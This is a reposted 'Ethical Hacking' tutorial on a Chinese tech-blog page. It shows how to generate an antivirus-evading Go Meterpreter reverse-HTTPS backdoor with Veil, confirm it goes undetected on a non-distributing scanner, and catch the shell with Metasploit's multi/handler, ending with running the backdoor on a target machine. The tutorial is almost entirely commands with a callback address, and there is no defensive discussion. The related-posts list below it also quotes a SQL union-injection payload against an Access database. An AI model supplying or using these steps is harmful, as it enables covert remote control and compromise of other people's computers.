Ethical Hacking - GAINING ACCESS(17)

Sabrina

2020-01-29

关注关注

CLIENT SIDE ATTACKS - Backdooring exe‘ s

Download an executable file first.

VEIL - FRAMEWORK

A backdoor is a file that gives us full control over the machine that it gets executed on.

Backdoors can be caught by Anti-Virus programs.

Veil is a framework for generating Undetectable backdoors.

1. Run veil

veil

Ethical Hacking - GAINING ACCESS(17)

Select tool 1 - Evasion.

Ethical Hacking - GAINING ACCESS(17)

2. List payloads and Select one

Veil/Evasion>: list
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================


 [*] Available Payloads:

    1)    autoit/shellcode_inject/flat.py

    2)    auxiliary/coldwar_wrapper.py
    3)    auxiliary/macro_converter.py
    4)    auxiliary/pyinstaller_wrapper.py

    5)    c/meterpreter/rev_http.py
    6)    c/meterpreter/rev_http_service.py
    7)    c/meterpreter/rev_tcp.py
    8)    c/meterpreter/rev_tcp_service.py

    9)    cs/meterpreter/rev_http.py
    10)    cs/meterpreter/rev_https.py
    11)    cs/meterpreter/rev_tcp.py
    12)    cs/shellcode_inject/base64.py
    13)    cs/shellcode_inject/virtual.py

    14)    go/meterpreter/rev_http.py
    15)    go/meterpreter/rev_https.py
    16)    go/meterpreter/rev_tcp.py
    17)    go/shellcode_inject/virtual.py

    18)    lua/shellcode_inject/flat.py

    19)    perl/shellcode_inject/flat.py

    20)    powershell/meterpreter/rev_http.py
    21)    powershell/meterpreter/rev_https.py
    22)    powershell/meterpreter/rev_tcp.py
    23)    powershell/shellcode_inject/psexec_virtual.py
    24)    powershell/shellcode_inject/virtual.py

    25)    python/meterpreter/bind_tcp.py
    26)    python/meterpreter/rev_http.py
    27)    python/meterpreter/rev_https.py
    28)    python/meterpreter/rev_tcp.py
    29)    python/shellcode_inject/aes_encrypt.py
    30)    python/shellcode_inject/arc_encrypt.py
    31)    python/shellcode_inject/base64_substitution.py
    32)    python/shellcode_inject/des_encrypt.py
    33)    python/shellcode_inject/flat.py
    34)    python/shellcode_inject/letter_substitution.py
    35)    python/shellcode_inject/pidinject.py
    36)    python/shellcode_inject/stallion.py

    37)    ruby/meterpreter/rev_http.py
    38)    ruby/meterpreter/rev_https.py
    39)    ruby/meterpreter/rev_tcp.py
    40)    ruby/shellcode_inject/base64.py
    41)    ruby/shellcode_inject/flat.py

3. Generating an undetectable backdoor using Veil 3

use go/meterpreter/rev_https.py

Ethical Hacking - GAINING ACCESS(17)

set LHOST 10.0.0.15set LPORT 8080set PROCESSORS 1set SLEEP 6

Ethical Hacking - GAINING ACCESS(17)

4. Generate backdoor

generate

Ethical Hacking - GAINING ACCESS(17)

Scan the file through https://nodistribute.com/.

Ethical Hacking - GAINING ACCESS(17)

Run hander

1. Run Metasploit

msfconsole

2. Use the handler module.

use exploit/multi/handler

3. Set payload

set PAYLOAD [veil payload]

Ethical Hacking - GAINING ACCESS(17)

4. Set IP

set LHOST [your IP]

5. Set port

set LPORT [veil port]

Ethical Hacking - GAINING ACCESS(17)

6. exploit

exploit

Ethical Hacking - GAINING ACCESS(17)

Run the backdoor file on the target machine sucessfully.

Ethical Hacking - GAINING ACCESS(17)

access

Sabrina

0 关注 0 粉丝 0 动态

关注关注

docker: Error response from daemon: Ports are not available

在使用 docker 部署 zookeeper 时，出现错误提示。docker run -d -p 2181:2181 --name=zookeeper --privileged zookeeper. docker: Error response from

yangliuhbhd 2020-09-24

深入浅析ASP在线压缩access数据库的方法

ASP在线压缩ACCESS数据库原理很简单：利用JRO.JetEngine的压缩功能建立一个新的数据库文件，然后把原来的删掉、替换！既然这样，压缩程序只需几行就ok了！把下面的代码保存为**.asp，数据库文件放在相同目录下，执行asp搞定！Compact

风之羽翼 2020-09-14

Navicat 创建数据库连接提示1045 access denied for user

情况1：新装的mysql服务。执行1或者2后，需要立即重新修改密码：alter user ‘root‘@‘localhost‘ identified by ‘新密码‘；

luotuofeile 2020-07-28

nginx 日志切割

nginx 日志一般都是两种access.log error.log ，可以每个location 区域配置一份，也就是每个请求服务一个日志。它的日志不会自动切割，需要人为根据时间或者日志量切割。　　LOG_PATH=/opt/nginx/logs 　

Strongding 2020-06-25

golang之JWT实现的示例代码

JSON Web Token是一个开放标准，它定义了一种紧凑且自包含的方式，用于在各方之间以JSON方式安全地传输信息。由于此信息是经过数字签名的，因此可以被验证和信任。可以使用秘密或使用RSA或ECDSA的公钥/私钥对对JWT进行签名。直白的讲jwt就是

xuanwenchao 2020-06-14

oracle hint 知多少

>set pagesize 500>set linesize 300>select NAME,CLASS,VERSION,PROPERTY from v$sql_hint where name like ‘%INDEX%‘;

昊 2020-06-04

Nginx 设置cors跨域

在我们的开发中，经常遇到跨域，这个时候，可以通过cors来解决。在web服务器上进行设置cors 跨域，这样就不必改动代码。add_header ‘Access-Control-Allow-Methods‘ ‘GET, POST, OPTIONS‘;# C

ysmh00 2020-05-14

apache2 日志文件太大的解决方案

apache下有个日志文件叫error.log会记录运行过程中的错误，还有个access.log会记录谁访问了你的网站，每一次访问都对应者一条访问记录，也是绝了！1），关闭apache，打开httpd.conf,写出log日志的级别由warn上升到了cri

ErixHao 2020-05-08

Api接口登录的鉴权方案

app登录就不能使用session，所以我们这里可以使用登录成功后要产生一个token值，以后用户每次访问app都要在header头带着这个token值,而这个token值需要一个过期时间。如果解密失败或者数据库中没有数据或者时间过期了让用户重新登陆。

数据库之扑朔迷离 2020-05-06

数据库技术及应用实践教程——Access 2010刘敏华谷岩课后答案

刘敏华谷岩数据库技术及应用实践教程——Access 2010习题答案?本书可作为高等学校非计算机专业“数据库技术及应用”课程的实践教材，刘敏华谷岩数据库技术及应用实践教程——Access 2010课后答案板。读者可通过本书提供的用户名和密码访问数字课程

whyname 2020-04-29

[access同步数据库]生成可在 Web 上共享的 Access 数据库

Microsoft 不再建议创建和使用 Access 2010 web 数据库。有关详细信息，请参阅Access 2010 web 数据库路线图。　　可以使用 Access 2010 和 Access Services构建 Web 数据库应用程序。用户帐户

daillo 2020-04-20

[access 数据库同步]Access数据库到Mysql数据库实时更新

　　首先是将Access数据库中的大量数据转存到mysql数据库中，然后，随着Access中数据的增加，要同步更新mysql数据库，更新周期自定。　　1.用MAX的sql语句查找mysql数据表，找出时间那一列的最大时间MAX. 　　3.用分列的方式，将读

踩风火轮的乌龟 2020-04-19

ssm整合Mybatis无法连接数据库的问题 ‘Access denied for user...’

自己在写一个整合例子的时候发现各种文件配置好之后数据库无法连接，一直报错拒绝访问。尝试了各种方法，利用Mybatis原生的方式创建 SqlSession 能够正常访问数据库。里面的报错的 user 是系统的用户名而不是配置文件中的 user. 所以只要不命

hitxueliang 2020-04-18

VB连接ACCESS数据库，使用 LIKE 通配符问题

Access支持两组通配符，因为它支持结构化查询语言的两个标准（条件）。通常，在运行查询和查找和替换Access数据库的操作时，使用ANSI-89 通配符。在对Access项目运行查询时使用ANSI-92 通配符

hithyc 2020-04-17

ACCESS数据库偏移注入

偏移注入主要是针对知道表，但是不知道字段的ACCESS数据库。id=1406 order by 22 返回正常。id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,*

snowguy 2020-04-10

1.获取微信公众平台access_token

access_token是公众号的全局唯一接口调用凭据，公众号调用各接口时都需使用access_token。开发者需要进行妥善保存。access_token的存储至少要保留512个字符空间。access_token的有效期目前为2个小时，需定时刷新，重复获

zengfanpei 2020-03-08

kubernetes 创建pod 启动不了处于ContainerCreating状态

证书问题，处理方式如下：

技术积累LZ 2020-02-18

跨域 jsonp

$.ajax(‘http://192.168.1.107:8080/test/test.do‘;,{ data:{ username:

newthon 2020-02-14

mysql链接报错1045:Access denied for user [email protected]解决方法

安装了mysql5，本地连接没有问题，但是通过局域网的其他电脑连接报错1045：Access denied for user. 　　　　　　　在my.ini里面68行添加 skip_grant_tables 然后保存关闭。然后在命令行用net stop

阿亮 2020-01-30

Python自动化发微博（使用原生API）

虽然有第三方的Python库，但也只是对request请求作简单的封装。所以以下将不使用第三方库。要使用微博的API，需先要有个应用。随便哪个应用都行，注册应用的主要目的是要获得App Key 和App Secret。API的调用需要登录授权获得acces

yogoma 2020-01-18

安科网

Ethical Hacking - GAINING ACCESS(17)

Sabrina

Sabrina

相关推荐

docker: Error response from daemon: Ports are not available

深入浅析ASP在线压缩access数据库的方法

Navicat 创建数据库连接提示1045 access denied for user

nginx 日志切割

golang之JWT实现的示例代码

oracle hint 知多少

Nginx 设置cors跨域

apache2 日志文件太大的解决方案

Api接口登录的鉴权方案

数据库技术及应用实践教程——Access 2010刘敏华谷岩课后答案

[access同步数据库]生成可在 Web 上共享的 Access 数据库

[access 数据库同步]Access数据库到Mysql数据库实时更新

ssm整合Mybatis无法连接数据库的问题 ‘Access denied for user...’

VB连接ACCESS数据库，使用 LIKE 通配符问题

ACCESS数据库偏移注入

1.获取微信公众平台access_token

kubernetes 创建pod 启动不了处于ContainerCreating状态

跨域 jsonp

mysql链接报错1045:Access denied for user [email protected]解决方法

Python自动化发微博（使用原生API）

Sabrina